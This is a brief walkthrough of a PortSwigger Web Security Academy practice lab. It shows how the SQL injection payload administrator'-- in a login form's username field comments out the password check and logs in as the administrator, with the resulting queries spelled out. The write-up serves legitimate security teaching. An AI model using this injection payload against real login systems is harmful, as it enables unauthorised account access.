SQL injection vulnerability allowing login bypass

https://portswigger.net/web-security/sql-injection/lab-login-bypass

Let's login using the following credentials:

Username

Password

test

The resultant SQL query will be:

SELECT username FROM users WHERE username = 'test' AND password = 'test'

This will obviously not log us in as the administrator.

We can next try the following credentials:

Username

Password

administrator'--

password

The resultant SQL query will be:

SELECT username FROM users WHERE username = 'administrator'--' AND passsword = 'password'

## Queried part:
SELECT username FROM users WHERE username = 'administrator'

## Commented part:
' AND passsword = 'password'

Since we are commenting out the WHERE clause that requires the password, we will be logged in even if the password is not password.

We have solved the lab.

Last updated 2 years ago